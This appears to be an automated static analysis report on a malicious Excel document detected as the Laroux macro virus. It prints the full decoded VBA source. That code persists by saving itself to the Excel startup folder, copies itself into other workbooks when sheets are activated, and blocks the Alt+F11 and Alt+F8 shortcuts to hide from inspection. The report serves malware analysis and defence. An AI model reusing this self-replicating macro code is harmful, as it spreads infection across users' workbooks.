Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 895e4d1aa5e90771…

MALICIOUS

Office (OLE)

21.5 KB Created: 1996-12-17 01:32:42 Authoring application: Microsoft Excel First seen: 2015-09-19
MD5: 004feda8c82d9cd171b09359cb9cf460 SHA-1: 85386bdb647f26be645a024db02f0cb1167a6b2c SHA-256: 895e4d1aa5e90771739fc3989362dc2ccbd213f19a873a808101b11efa441044
88 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file is a malicious Excel document containing VBA macros. The `auto_open` macro attempts to copy itself to the Excel startup folder as 'StartUp.xls' to achieve persistence. It also sets up event handlers for specific key presses and sheet activations, likely to maintain control or evade detection. The ClamAV detection 'Doc.Macro.Laroux-5893719-0' further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 977 bytes
SHA-256: 2748440ec665e3a050db338ead70be0716fd2513779f96555735a09d74fb9511
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
ThisWorkbook.Save
  On Error Resume Next
   MsgBox "", "", "我来了!"
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
   Application.ScreenUpdating = False
  ThisWorkbook.Sheets("StartUp").Copy
  ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
  n$ = ActiveWorkbook.Name
  ActiveWindow.Visible = False
  Workbooks("StartUp.xls").Save
  Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub ycop()
  On Error Resume Next
 If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
  Application.ScreenUpdating = False
   MsgBox "", "", "我又来了!"
 n$ = ActiveSheet.Name
 Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
 End If
    End Sub